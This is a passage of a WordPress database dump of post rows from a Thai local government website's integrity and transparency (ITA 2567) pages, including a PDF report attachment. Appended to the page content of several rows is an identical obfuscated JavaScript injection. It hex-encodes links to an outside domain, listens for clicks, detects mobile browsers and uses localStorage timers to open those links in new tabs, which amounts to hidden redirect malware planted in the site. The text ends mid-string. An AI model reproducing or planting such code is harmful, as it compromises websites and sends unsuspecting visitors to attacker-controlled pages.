href=\"http://pakhaeng.ssk.in.th/?page_id=1036\" data-type=\"page\" data-id=\"1036\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_893939-da\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_893939-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-21 13:57:51','2024-08-21 06:57:51','',871,'http://pakhaeng.ssk.in.th/?p=1051',0,'revision','',0),
(1052,1,'2024-08-23 09:10:16','2024-08-23 02:10:16','<!-- wp:file {\"id\":1053,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน\"></object><a id=\"wp-block-file--media-c9e793bc-9295-4011-866a-6ce970ecdd86\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน.pdf\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-c9e793bc-9295-4011-866a-6ce970ecdd86\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน','','publish','closed','closed','','%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%94%e0%b8%b3%e0%b9%80%e0%b8%99%e0%b8%b4%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%9e-2','','','2024-08-23 09:10:17','2024-08-23 02:10:17','',0,'http://pakhaeng.ssk.in.th/?page_id=1052',0,'page','',0),
(1053,1,'2024-08-23 09:10:02','2024-08-23 02:10:02','','รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน','','inherit','','closed','','%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%94%e0%b8%b3%e0%b9%80%e0%b8%99%e0%b8%b4%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%9e-3','','','2024-08-23 09:10:02','2024-08-23 02:10:02','',1052,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน.pdf',0,'attachment','application/pdf',0),
(1055,1,'2024-08-23 09:10:16','2024-08-23 02:10:16','<!-- wp:file {\"id\":1053,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน\"></object><a id=\"wp-block-file--media-c9e793bc-9295-4011-866a-6ce970ecdd86\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน.pdf\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-c9e793bc-9295-4011-866a-6ce970ecdd86\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6